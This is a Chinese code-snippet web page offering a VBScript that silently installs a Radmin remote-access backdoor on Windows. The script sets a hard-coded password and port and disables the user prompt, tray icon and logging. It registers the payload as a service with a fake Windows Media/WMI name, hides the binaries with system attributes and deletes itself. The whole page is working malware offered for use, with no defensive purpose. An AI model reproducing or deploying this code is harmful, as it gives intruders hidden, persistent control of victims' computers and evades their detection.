复制代码 代码如下:
onerrorresumenext
constHKEY_LOCAL_MACHINE=&H80000002
strComputer="."
SetStdOut=WScript.StdOut
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&_
strComputer&"rootdefault:StdRegProv")
strKeyPath="SYSTEMRAdmin"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEMRAdminv2.0"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEMRAdminv2.0Server"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEMRAdminv2.0Serveriplist"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEMRAdminv2.0ServerParameters"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
SetobjRegistry=GetObject("Winmgmts:rootdefault:StdRegProv")
strPath="SYSTEMRAdminv2.0ServerParameters"
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary=Array(1,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary=Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)//此为注册表导出十六进制转为十进制数据pass:241241241
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)//Radmin密码
uBinary=Array(5,4,0,0)//端口:1029
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary=Array(10,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&strComputer&"rootdefault:StdRegProv")
strKeyPath="SYSTEMRAdminv2.0ServerParameters"
strValueName="LogFilePath"
strValue="c:logfile.txt"
setwshshell=createobject("wscript.shell")
a=wshshell.run("sc.execreateWinManageHelpbinpath=%systemroot%system32Exporer.exestart=auto",0)
oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!"&strComputer&"rootdefault:StdRegProv")
strKeyPath="SYSTEMControlSet001ServicesWinManageHelp"
strValueName="Description"
strValue="WindowsMediaPlayerWindowsManagementInstrumentationPlayerDrivers."
oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName="DisplayName"
strValue="WindowsManagementInstrumentationPlayerDrivers"
oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName="ImagePath"
strValue="c:windowssystem32Exporer.exe/service"
oReg.SetExpandedStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
setwshshell=createobject("wscript.shell")
a=wshshell.run("netstartWinManageHelp",0)
b=wshshell.run("attrib+r+h+s%systemroot%system32exporer.exe",0)
c=wshshell.run("attrib+r+h+s%systemroot%system32AdmDll.dll",0)
d=wshshell.run("attrib+r+h+s%systemroot%system32raddrv.dll",0)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)//自删除
最好的删除代码不错
createobject("scripting.filesystemobject").deletefile(script.scriptname)
【Vbs脚本实现radmin终极后门代码_删除自身】相关文章:
★ vbscript Registry 注册表操作实现代码(读写删除)
★ WINDOWS脚本实践:为SAP补丁制作的VBS脚本代码
★ 用vbs从本地 Administrators 组中删除组